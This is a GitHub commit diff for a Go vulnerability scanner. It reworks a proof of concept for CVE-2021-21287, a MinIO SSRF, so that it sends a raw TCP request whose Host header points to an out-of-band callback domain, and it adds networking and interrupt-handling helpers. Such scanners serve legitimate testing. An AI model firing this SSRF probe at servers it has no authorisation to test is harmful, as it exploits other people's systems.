优化代码结构

m4ll0k · Jan 30, 2022 · 20af669 · 20af669
1 parent d96b1fd
commit 20af669
Show file tree

Hide file tree

Showing 4 changed files with 97 additions and 27 deletions.
diff --git a/active/poc/CVE-2021-21287.go b/active/poc/CVE-2021-21287.go
@@ -1,8 +1,7 @@
 package poc
 
 import (
-	"net/http"
-	"strings"
+	"fmt"
 	"youzai/util"
 )
 
@@ -26,26 +25,23 @@ func (Info *PocInfo) CVE_2021_21287_Init() {
 	poc.Config.Proxy = PocCustomize.Config.Proxy
 	poc.Config.Proxy_Url = PocCustomize.Config.Proxy_Url
 
-	// 生成http客户端
-	cli := util.Http_Client(poc.Config.Timeout, poc.Config.Proxy, poc.Config.Proxy_Url)
-
 	// 编写自定义检测函数，返回值有两个，第一个是判断是否存在存在漏洞，第二个参数返回响应状态码
 	poc.Config.Check = func() (bool, int) {
 		pocData := `{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}`
 		randstr, ceye_url := util.Get_Ceye()
 
-		request, err := http.NewRequest("POST", poc.Config.Url+"/minio/webrpc", strings.NewReader(pocData))
-		if err != nil {
-			return false, 0
-		}
-		request.Host = ceye_url
-		request.Header.Set("Content-Type", "application/json")
-		if response, err := cli.Do(request); err != nil {
-			return false, 0
-		} else {
-			if util.Ceye_Check(randstr) {
-				return true, response.StatusCode
-			}
+		tcpData := "POST /minio/webrpc HTTP/1.1\r\n"
+		tcpData += fmt.Sprintf("Host: %s\r\n", ceye_url)
+		tcpData += poc.Config.User_Agent + "\r\n"
+		tcpData += "Content-Type: application/json\r\n"
+		tcpData += "Content-Length: 76\r\n"
+		tcpData += "Connection: close\r\n\r\n"
+		tcpData += pocData
+
+		_, code := util.Tcp_Send(poc.Config.Url, tcpData, 10)
+		success := util.Ceye_Check(randstr)
+		if success {
+			return true, code
 		}
 		return false, 0
 	}

diff --git a/active/pocScan.go b/active/pocScan.go
@@ -88,7 +88,6 @@ func Scanning_Panel(wg *sync.WaitGroup) {
 	green := color.FgGreen.Render
 	blue := color.FgBlue.Render
 	yellow := color.FgYellow.Render
-	cyan := color.FgCyan.Render
 	is_Stop := false
 	for {
 		if is_Stop {
@@ -98,7 +97,7 @@ func Scanning_Panel(wg *sync.WaitGroup) {
 		for i := 0; i < len(Scanning); i++ {
 			numtemp, _ := strconv.ParseFloat(fmt.Sprintf("%.2f", float64(Scan_Num)/float64(Scan_Num_True)), 64)
 			num := int(numtemp * 50)
-			color.Print(green("[INFO]"), blue(Scanning[i]), yellow("  <["), cyan(strings.Repeat("■", num)), strings.Repeat(" ", 50-num), yellow("]>  "), int(numtemp*100), "%", "\r")
+			color.Print(green("[INFO]"), blue(Scanning[i]), yellow("  <["), strings.Repeat("<fg=00FFFF>■</>", num), strings.Repeat(" ", 50-num), yellow("]>  "), int(numtemp*100), "%", "\r")
 			time.Sleep(time.Millisecond * 100)
 			if num == 50 {
 				after := time.Now().Unix()

diff --git a/main.go b/main.go
@@ -2,6 +2,9 @@ package main
 
 import (
 	"flag"
+	"fmt"
+	"os"
+	"os/signal"
 	"strings"
 	"time"
 	"youzai/active"
@@ -63,6 +66,16 @@ func usage_info() {
 	color.Cyanln(h)
 }
 
+func active_interrupt() {
+	sigChan := make(chan os.Signal, 1)
+	signal.Notify(sigChan, os.Interrupt)
+	sig := <-sigChan
+	_ = sig
+	fmt.Println()
+	color.Println("<fg=DC143C>[EXIT]</>", "<fg=FFFF00>The Scan Stop Because Of User Interrupt</>")
+	os.Exit(0)
+}
+
 // 执行扫描
 func active_Check(vuln_type string) {
 	// 检查是否使用代理
@@ -118,5 +131,6 @@ func config_info() {
 
 // 扫描器入口
 func main() {
+	go active_interrupt()
 	config_info()
 }
diff --git a/util/util.go b/util/util.go
@@ -5,9 +5,12 @@ import (
 	"fmt"
 	"io/ioutil"
 	"math/rand"
+	"net"
 	"net/http"
 	"net/http/httptrace"
 	"net/url"
+	"regexp"
+	"strconv"
 	"strings"
 	"time"
 
@@ -25,6 +28,15 @@ type Ceye_Info struct {
 
 var Ceye = Ceye_Info{}
 
+// 获取ceye随机数和域名
+func Get_Ceye() (randstr, ceye_url string) {
+	rand.Seed(time.Now().UnixNano())
+	t := rand.Intn(100000)
+	randstr = fmt.Sprintf("%d", t)
+	ceye_url = randstr + "." + Ceye.Ceye_Url
+	return randstr, ceye_url
+}
+
 // 用于检测ssrf的函数
 func Ceye_Check(randstr string) bool {
 	red := color.Red.Render
@@ -71,6 +83,63 @@ func Http_Client(timeout int, proxy bool, proxy_url string) *http.Client {
 	return cli
 }
 
+// 使用tcp发送数据
+func Tcp_Send(target_url string, data string, timeout int) (response_data string, response_code int) {
+	reg := regexp.MustCompile(`.*(\d{3}).*`)
+	urli := url.URL{}
+	url, _ := urli.Parse(target_url)
+	switch url.Scheme {
+	case "http":
+		var host = url.Host
+		if !strings.Contains(host, ":") {
+			host = url.Host + ":80"
+		}
+		net, err := net.DialTimeout("tcp", host, time.Second*time.Duration(timeout))
+		if err != nil {
+			color.Println("<fg=FFA500>[WARNING]</>", err)
+		}
+		defer net.Close()
+		_, _ = net.Write([]byte(data))
+		buf := make([]byte, 20480)
+		n, err := net.Read(buf)
+		if err != nil {
+			color.Println("<fg=FFA500>[WARNING]</>", err)
+		}
+		result := reg.FindStringSubmatch(string(buf[:n]))
+		if len(result) != 0 {
+			code, _ := strconv.Atoi(result[len(result)-1])
+			return string(buf[:n]), code
+		}
+		return "", 0
+
+	case "https":
+		conf := &tls.Config{
+			InsecureSkipVerify: false,
+		}
+		var host = url.Host
+		if !strings.Contains(host, ":") {
+			host = url.Host + ":443"
+		}
+		net, err := tls.Dial("tcp", host, conf)
+		if err != nil {
+			color.Println("<fg=FFA500>[WARNING]</>", err)
+		}
+		defer net.Close()
+		_, _ = net.Write([]byte(data))
+		buf := make([]byte, 20480)
+		n, err := net.Read(buf)
+		if err != nil {
+			color.Println("<fg=FFA500>[WARNING]</>", err)
+		}
+		result := reg.FindStringSubmatch(string(buf[:n]))
+		if len(result) != 0 {
+			code, _ := strconv.Atoi(result[len(result)-1])
+			return string(buf[:n]), code
+		}
+	}
+	return "", 0
+}
+
 // 检测网络连通性
 func Net_Check(url string) bool {
 	green := color.FgGreen.Render
@@ -104,11 +173,3 @@ func Net_Check(url string) bool {
 		return true
 	}
 }
-
-func Get_Ceye() (randstr, ceye_url string) {
-	rand.Seed(time.Now().UnixNano())
-	t := rand.Intn(100000)
-	randstr = fmt.Sprintf("%d", t)
-	ceye_url = randstr + "." + Ceye.Ceye_Url
-	return randstr, ceye_url
-}